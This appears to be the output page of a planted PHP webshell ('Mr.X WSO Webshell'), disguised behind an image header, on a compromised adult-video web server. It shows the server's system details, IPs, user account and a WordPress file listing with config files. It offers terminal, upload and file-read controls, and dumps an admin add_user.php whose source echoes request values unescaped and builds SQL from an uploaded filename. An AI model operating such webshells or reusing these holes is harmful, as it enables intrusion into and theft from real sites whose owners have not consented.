����JFIF���������www.stoptube.com - WSOX ENC
Attention:
Uname:
Php:
Hdd:
Cwd:		Mr.X WSO Webshell! - Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet
Linux msm5694.mjhst.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
5.3.29 Safe mode: OFF Datetime: 2026-04-09 02:05:39
1999.30 GB Free: 82.14 GB (4%)
/home/httpd/html/stoptube.com/ drwxr-xr-x [ root ] [ home ] Text

Server IP:
127.0.0.54
Client IP:
216.73.216.53
[ Files ][ Logout ]

File manager

NameSizeModifyPermissionsActions
[ . ]dir2020-10-29 21:25:34drwxr-xr-xRename Touch
[ .. ]dir2026-04-09 02:05:38drwxr-xr-xRename Touch
[ cgi-bin ]dir2012-04-08 21:15:31drwxr-xr-xRename Touch
[ public_html ]dir2023-11-10 01:29:28drwxr-xr-xRename Touch
[ stats ]dir2012-05-18 05:35:08drwxr-xr-xRename Touch
[ wp-admin ]dir2018-10-17 02:02:36drwxr-xr-xRename Touch
[ wp-content ]dir2026-04-09 01:59:08drwxrwxr-xRename Touch
[ wp-includes ]dir2018-10-17 02:02:35drwxrwxr-xRename Touch
[ wpbackup-mojo ]dir2013-09-23 12:20:27drwxr-xr-xRename Touch
120x240_2.gif13.45 KB2008-06-28 03:13:23-rw-r--r--Rename Touch Edit Download
120x240_4.gif11.19 KB2008-06-28 03:15:01-rw-r--r--Rename Touch Edit Download
google33e705b4a02b516c.html53 B2018-10-09 07:59:06-rw-r--r--Rename Touch Edit Download
google54c2bf32c9bf2083.html7 B2009-05-30 01:17:01-rw-r--r--Rename Touch Edit Download
grepsearch.php910 B2009-05-31 03:50:51-rw-r--r--Rename Touch Edit Download
index.php418 B2018-10-17 02:00:34-rw-r--r--Rename Touch Edit Download
license.txt19.47 KB2018-10-17 02:00:34-rw-r--r--Rename Touch Edit Download
readme.html7.24 KB2020-10-29 21:25:34-rw-r--r--Rename Touch Edit Download
robots.txt29 B2014-04-01 00:38:43-rw-r--r--Rename Touch Edit Download
scan_files.php3.34 KB2009-06-03 20:33:08-rw-r--r--Rename Touch Edit Download
wp-activate.php6.72 KB2018-12-13 02:57:59-rw-r--r--Rename Touch Edit Download
wp-atom.php226 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-blog-header.php364 B2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-comments-post.php1.84 KB2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-commentsrss2.php244 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-config-sample.php2.79 KB2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-config.php1.47 KB2018-10-04 12:51:18-rw-rw-r--Rename Touch Edit Download
wp-config.php_backup_ticket_5246641.30 KB2018-10-03 15:00:12-rw-r--r--Rename Touch Edit Download
wp-cron.php3.58 KB2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-feed.php246 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-links-opml.php2.37 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-load.php3.23 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-login.php36.92 KB2018-12-13 02:57:59-rw-r--r--Rename Touch Edit Download
wp-mail.php7.86 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-pass.php494 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-rdf.php224 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-register.php334 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-rss.php224 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-rss2.php226 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-settings.php15.87 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-signup.php29.39 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-trackback.php4.51 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wpupdate.sh12.75 KB2013-09-22 17:09:27-rw-r--r--Rename Touch Edit Download
xmlrpc.php2.99 KB2018-10-17 02:02:34----------Rename Touch Edit Download
 
Change dir:
Read file:
Make dir: (Not writable)
Make file: (Not writable)
Terminal:
Upload file: (Not writable)

HEX
HEX
Server: Apache
System: Linux msm5694.mjhst.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User: camjab_ssh (1000)
PHP: 5.3.29
Disabled: NONE
$ pwd: /home/httpd/html/baretube.com.new/admin/
Upload Files
File: /home/httpd/html/baretube.com.new/admin/add_user.php
<?php
require "db.php";

if (isset($_POST['formSubmit'])) {

    $_POST = array_map_array('trim', $_POST);
    $_POST = array_map_array('strip_tags', $_POST, array('description', 'freeform'));

    if ($_POST['username'] == '') {
        setMessage('Username is required!', 'error');
    } else if (is_array(dbQuery("SELECT `record_num` FROM `users` WHERE `username` = '" . mysqli_real_escape_string($dbconn, $_POST['username']) . "'", false))) {
        setMessage('This username is already taken!', 'error');
    }

    if ($_POST['email'] == '') {
        setMessage('E-mail is required!', 'error');
    } else if (!filter_var($_POST['email'], FILTER_VALIDATE_EMAIL)) {
        setMessage('Invalid e-mail address', 'error');
    } else if (is_array(dbQuery("SELECT `record_num` FROM `users` WHERE `email` = '" . mysqli_real_escape_string($dbconn, $_POST['email']) . "'", false))) {
        setMessage('This e-mail is not available!', 'error');
    }

    if ($_FILES['file']['tmp_name']) {
        if (filesize($_FILES['file']['tmp_name']) > $config['max_avatar_size'] * 1024) {
            setMessage('Avatar is too big. It can be a maximum of %sizekB in GIF, JPG, or PNG format.', array('%size' => $config['max_avatar_size']), 'error');
        } else {
            $ext = explode(".", strtolower($_FILES['file']['name']));
            $ext = array_reverse($ext);
            if (!in_array($ext[0], array('jpg', 'jpeg', 'png', 'gif'))) {
                setMessage('You may only upload image files for "Avatar"', 'error');
            }
        }
    }

    if ($_FILES['banner']['tmp_name']) {
        $ext = explode(".", strtolower($_FILES['banner']['name']));
        $ext = array_reverse($ext);
        if (!in_array($ext[0], array('jpg', 'jpeg', 'png', 'gif'))) {
            setMessage('You may only upload image files for "Banner"', 'error');
        }
    }

    if (!getMessages(false, 'error')) {
        $salt = generateSalt(rand(5, 10));
        $profile = array(
            'username' => $_POST['username'],
            'password' => md5($_POST['password'] . $salt),
            'salt' => $salt,
            'is_admin' => (int) $_POST['is_admin'],
            'email' => $_POST['email'],
            'user_level' => (int) $_POST['user_level'],
            'location' => $_POST['location'],
            'age' => $_POST['age'],
            'gender' => $_POST['gender'],
            'description' => strip_tags($_POST['description']),
            'name' => $_POST['name'],
            'phone' => $_POST['phone'],
            'im' => $_POST['im'],
            'im_type' => $_POST['im_type'],
            'backlink' => $_POST['backlink'],
            'program_name' => $_POST['program_name'],
            'program_url' => $_POST['program_url'],
            'premium' => (int) $_POST['premium'],
            'tokens' => (int) $_POST['tokens'],
            'freeform' => strip_tags($_POST['freeform']),
            'custom' => serialize($_POST['custom']),
            'enabled' => (int) $_POST['enabled'],
        );
        $insert_id = dbInsert('users', $profile);
        if (is_numeric($insert_id)) {
            dbInsert('users_notifications', array(
                'new_message' => 1,
                'new_comment' => 1,
                'new_post' => 1,
                'friend_request' => 1,
                'user_id' => $insert_id,
            ));
            if ($_FILES['file']['tmp_name']) {
                $ext = explode(".", strtolower($_FILES['file']['name']));
                $ext = array_reverse($ext);
                $filename = uniqid() . '.' . $ext[0];
                $target = "$misc_path/$filename";
                $target_big = "$misc_path/big-$filename";
                move_uploaded_file($_FILES['file']['tmp_name'], $target_big);
                makeImageThumbnail($target_big, $target, 800, 600, 'mogrify');
                makeImageThumbnail($target_big, $target, 170, 130);
                dbQuery("UPDATE `users` SET `avatar` = '$filename' WHERE `record_num` = '$insert_id'", false);
            }
            if ($_FILES['banner']['tmp_name']) {
                $filename = uniqid() . trim($_FILES['banner']['name']);
                $target = "$misc_path/$filename";
                move_uploaded_file($_FILES['banner']['tmp_name'], $target);
                dbQuery("UPDATE `users` SET `banner` = '$filename' WHERE `record_num` = '$insert_id'");
            }
            setMessage('New user added. <a href="' . $basehttp . '/admin/users.php"><b>Click here to return to Users List</b></a>');
        } else {
            setMessage('Cannot create new user', 'error');
        }
        header("Location: $_SERVER[REQUEST_URI]");
        exit;
    } else {
        entities_walk($_POST);
    }
}
?>

<? require "header.php"; ?>

<div class="content-page">

    <div class="header-area">
        <div class="breadcrumbs">  
            <a href="index.php">Admin Home</a>          
            <span><a href="add_user.php">Add User</a></span>  
        </div>
    </div>

    <div class="content-outer">

        <h2>Add<strong>User</strong></h2>

        <div class="notification info">Please use the form to create users on the website.</div>

        <div class="content-inner">

            <? echo getMessages(); ?>

            <form action="" method="POST" enctype="multipart/form-data" class="form" novalidate autocomplete="off">
                <input type="hidden" name="sponsor" value="<?php echo $_GET['id']; ?>" />
                <table class="pagetable">
                    <thead>
                        <tr>
                            <th colspan="2">Add New User</th>
                        </tr>
                    </thead>
                    <tr>
                        <td>Username</td>
                        <td><input name="username" type="text" value="<?php echo $_POST['username']; ?>" required data-min-length="3" data-max-length="20" /></td>
                    </tr>
                    <tr>
                        <td>Password</td>
                        <td><input name="password" type="text" value="<?php echo $_POST['password']; ?>" required data-min-length="5" /></td>
                    </tr>
                    <tr>
                        <td>Email</td>
                        <td><input name="email" type="email" value="<?php echo $_POST['email']; ?>" required /></td>
                    </tr>
                    <tr>
                        <td>Admin Account</td>
                        <td>
                            <select name="is_admin">
                                <option<?php echo ($_POST['is_admin'] == '0') ? ' selected' : ''; ?> value="0">No</option>
                                <option<?php echo ($_POST['is_admin'] == '1') ? ' selected' : ''; ?> value="1">Yes</option>
                            </select>
                        </td>
                    </tr>
                    <tr>
                        <td>Location</td>
                        <td><input name="location" type="text" value="<?php echo $_POST['location']; ?>" /></td>
                    </tr>
                    <tr>
                        <td>Age</td>
                        <td><input name="age" type="number" value="<?php echo $_POST['age']; ?>" min="0" class="short" /></td>
                    </tr>
                    <tr>
                        <td>Gender</td>
                        <td>
                            <select name="gender">
                                <option<?php echo ($_POST['gender'] == 'Male') ? ' selected' : ''; ?> value="Male">Male</option>
                                <option<?php echo ($_POST['gender'] == 'Female') ? ' selected' : ''; ?> value="Female">Female</option>
                            </select>
                        </td>
                    </tr>
                    <tr>
                        <td>Description</td>
                        <td>
                            <textarea name="description" cols="45" rows="8"><?php echo $_POST['description']; ?></textarea>
                            <div class="hint">Allowed HTML tags: &lt;b&gt;, &lt;i&gt;, &lt;em&gt;, &lt;strong&gt;, &lt;a&gt;, &lt;img&gt;</div>
                        </td>
                    </tr>
                    <tr>
                        <td>User Type</td>
                        <td>
                            <select name="user_level">
                                <option<?php echo ($_POST['user_level'] == 0) ? ' selected' : ''; ?> value="0">Normal</option>
                                <option<?php echo ($_POST['user_level'] == 2) ? ' selected' : ''; ?> value="2">Partner</option>
                            </select>
                        </td>
                    </tr>
                    <tr>
                        <td>Backlink URL</td>
                        <td><input name="backlink" type="text" value='<?php echo $_POST['backlink']; ?>' /></td>
                    </tr>
                    <tr>
                        <td>Backlink Banner</td>
                        <td><input type="file" name="banner" /></td>
                    </tr>
                    <tr>
                        <td>Contact Name</td>
                        <td><input name="name" type="text" value="<?php echo $_POST['name']; ?>" /></td>
                    </tr>
                    <tr>
                        <td>Contact Phone</td>
                        <td><input name="phone" type="text" value="<?php echo $_POST['phone']; ?>" /></td>
                    </tr>
                    <tr>
                        <td>IM</td>
                        <td><input name="im" type="text" value="<?php echo $_POST['im']; ?>" /></td>
                    </tr>
                    <tr>
                        <td>IM Type</td>
                        <td>
                            <select name="im_type">
                                <option<?php echo ($_POST['im_type'] == 'ICQ') ? ' selected' : ''; ?>>ICQ</option>
                                <option<?php echo ($_POST['im_type'] == 'AIM') ? ' selected' : ''; ?>>AIM</option>
                                <option<?php echo ($_POST['im_type'] == 'MSN') ? ' selected' : ''; ?>>MSN</option>
                                <option<?php echo ($_POST['im_type'] == 'Y!M') ? ' selected' : ''; ?>>Y!M</option>
                            </select>
                        </td>
                    </tr>
                    <tr>
                        <td>Site Name</td>
                        <td><input name="program_name" type="text" value="<?php echo $_POST['program_name']; ?>" /></td>
                    </tr>
                    <tr>
                        <td>Site URL</td>
                        <td><input name="program_url" type="text" value="<?php echo $_POST['program_url']; ?>" /></td>
                    </tr>
                    <tr>
                        <td>Comments/Info</td>
                        <td>
                            <textarea name="freeform" cols="45" rows="8"><?php echo $_POST['freeform']; ?></textarea>
                            <div class="hint">Allowed HTML tags: &lt;b&gt;, &lt;i&gt;, &lt;em&gt;, &lt;strong&gt;, &lt;a&gt;, &lt;img&gt;</div>
                        </td>
                    </tr>
                    <tr>
                        <td>Premium</td>
                        <td>
                            <select name="premium">
                                <option<?php echo ($_POST['premium'] == '0') ? ' selected' : ''; ?> value="0">No</option>
                                <option<?php echo ($_POST['premium'] == '1') ? ' selected' : ''; ?> value="1">Yes</option>
                            </select>
                        </td>
                    </tr>
                    <tr>
                        <td>Tokens</td>
                        <td><input name="tokens" type="number" value="<?php echo $_POST['tokens']; ?>" min="0" class="short" /></td>
                    </tr>
                    <tr>
                        <td>Account Enabled</td>
                        <td>
                            <select name="enabled">
                                <option<? echo ($_POST['enabled'] == '0') ? ' selected' : ''; ?> value="0">No</option>
                                <option<? echo ($_POST['enabled'] == '1') ? ' selected' : ''; ?> value="1">Yes</option>
                            </select>
                        </td>
                    </tr>
                    <tr>
                        <td>Avatar</td>
                        <td><input type="file" name="file" /></td>
                    </tr>
                    <?php foreach ($custom_user_fields as $k => $v) { ?>
                        <tr>
                            <td><?php echo $k; ?></td>
                            <td>
                                <?php if (is_array($v)) { ?>
                                    <select name="custom[<?php echo $k; ?>]">
                                        <?php foreach ($v as $i) { ?>
                                            <option<?php echo ($custom[$k] == $i) ? ' selected' : ''; ?>><?php echo $i; ?></option>
                                        <?php } ?>
                                    </select>
                                <?php } else { ?>
                                    <input type="text" name="custom[<?php echo $k; ?>]" value="<?php echo $_POST['custom'][$k]; ?>" />
                                <?php } ?>
                            </td>
                        </tr>
                    <?php } ?>
                    <tr class="item submit">
                        <td colspan="2">
                            <input type="hidden" name="formSubmit" value="1">
                            <button type="submit" class="btn action-save">Submit</button>
                        </td>
                    </tr>
                </table>
            </form>
        </div>
    </div>

</div>

<?php require "footer.php"; ?>
@ Telegram